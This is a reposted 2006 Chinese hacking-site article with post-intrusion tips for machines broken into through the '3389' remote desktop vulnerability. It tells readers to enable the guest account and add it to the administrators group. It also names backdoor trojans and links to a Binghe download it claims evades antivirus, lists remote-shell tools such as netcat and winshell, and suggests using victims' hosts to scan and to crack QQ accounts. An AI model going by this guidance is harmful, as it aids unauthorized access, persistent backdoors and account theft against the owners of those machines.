| 关于3389漏洞的一点补充 |
|
| 作者:未知 文章来源:网络收集 点击数: 更新时间:2006-3-29 15:06:29
|
这个漏洞老了,不过对于一些弱智级网管还有用,其实能进3389的机器漏洞会有一大堆:) 以下是我进入一些这样的主机后的一些补充,老鸟不用看了!
首先要找一些国内ip把在wry.dll里面的一个个用也行,我是菜鸟,这个漏洞是不是只对简体中文机有用呀? 反正我扫描的hk和tw机器没用!
连上后要抓紧时间,只有一分钟!要不又要重新连接。打字不快的可以把要打的东西先打好 什么c:\winnt\system32、user、localgroup、administrators等等
进入后,有偷窥癖的可以到处翻翻,不过一般没什么,有主页的最好也别动,没什么意思 到是可以在这台机器上建一个自己的bbs,怎么建我就不多说了。
激活guest,这个随你便,担心网管堵了漏洞又删了你,呵呵,用guest进去也行呀 记得把guest加入administrators组!
留后门,看你自己掌握了什么,习惯用什么,最简单,用冰河了!可以试试自称没有漏洞和通用密码的8.0 不过可是查出来有病毒呀!也可以试试我 screen.width-600)this.style.width=screen.width-600;">_blank href=http://jerrybase.myetang.com/binghe/binghe.zip>http://jerrybase.myetang.com/binghe/binghe.zip 暂无杀! 不过是漏洞和通用密码都有!找个没用的端口,一般没事。 其实最好还是用telnet类的,netcat、winshell、tini、svr等 要不你直接打开它的telnet服务也行,设置一下就好。
主机能为我这种拨号的用户做的不多,我要它下载的大东东我也消受不了呀! 一般就是扫描或是用来破QQ,还有流光的sensor,不要太贪,开多了机器慢。 再就是开个自己的QQ,呵呵,自动回复就自己想想咯
找其他漏洞,这其实意义不大,算是学习学习,advanceserver上有好多我的pro上没有的:) 如果不想别人共用你的战果,就把漏洞堵了。
性子急的朋友用这个漏洞蛮好,我不喜欢猜密码,慢,没耐心。 ipc的就是,我用流光在某台主机扫了N久,一个没有! unicode漏洞也好,我就不哆嗦了。
|
|
[ 收藏此页到: 天天|和讯|博采|ViVi|狐摘|我摘|天极 ] 文章录入:kinda 责任编辑:kinda |
|
上一篇文章: PHP程序中常见的导致安全问题的错误例子分析 下一篇文章: 江湖系列漏洞 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |